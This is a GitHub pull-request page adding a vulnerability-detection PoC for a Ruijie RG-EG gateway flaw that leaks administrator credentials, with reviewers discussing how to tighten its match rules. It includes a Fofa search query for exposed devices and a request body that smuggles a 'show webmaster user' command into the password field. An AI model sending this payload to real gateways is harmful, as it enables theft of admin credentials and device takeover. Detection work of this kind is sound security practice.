Create ruijie-eg-info-leak #1214

Merged: 13 commits, Jul 9, 2021
exp1orer (Contributor) commented May 4, 2021

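What vulnerability does this PoC detect

Ruijie gateway (RG-EG) information leak exposing the administrator account and password

Test environment

Fofa: app="Ruijie-EG易网关"

Notes

To test the PoC, please use the following system: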
image

image

smile-jpg added this to 待审核 (pending review) in POC审核 (PoC review) via automation May 8, 2021
smile-jpg moved this from 待审核 (pending review) to 阅读通过 (read-through passed) in POC审核 May 8, 2021
body: |
username=admin&password=admin?show+webmaster+user
expression: |
response.status == 200 && "{\"data\":\".*?(\\w+)\\s(\\w+)\",\"status\":1}".bmatches(response.body)
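Review bot: the regex in `expression` is unanchored, and its `(\\w+)\\s(\\w+)` groups accept any two whitespace-separated words at the end of `data`, so any JSON reply carrying `"status":1` satisfies it. Anchor the pattern with `^` and `$`, and pair `response.status == 200` with a check on something specific to the product's response, so that a generic JSON endpoint does not produce a match.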
Collaborator commented:

The matching rule here is rather weak and prone to false positives. I suggest verifying by accessing a page that requires login.

Contributor Author commented:

Modified.

smile-jpg added the 等待作者修改 label (awaiting author changes: the PoC has problems; review continues after it is fixed) May 14, 2021
body: |
username={{username}}&password={{password}}
expression: |
response.status == 200 && response.body.bcontains(b"{\"data\":\"0\",\"status\":1}")
Collaborator commented:

The matching rule here is still too weak and prone to false positives. I suggest adding a match on Ruijie-specific features; I see the response header contains: Set-Cookie: RUIJIEID....... which can be added to the matching rule. Also, I suggest adding a Content-Type match after response.status == 200.

smile-jpg moved this from 阅读通过 (read-through passed) to 已测试 (tested) in POC审核 Jun 7, 2021
smile-jpg merged commit 238be64 into chaitin:master Jul 9, 2021
POC审核 automation moved this from 已测试 (tested) to 已完成 (done) Jul 9, 2021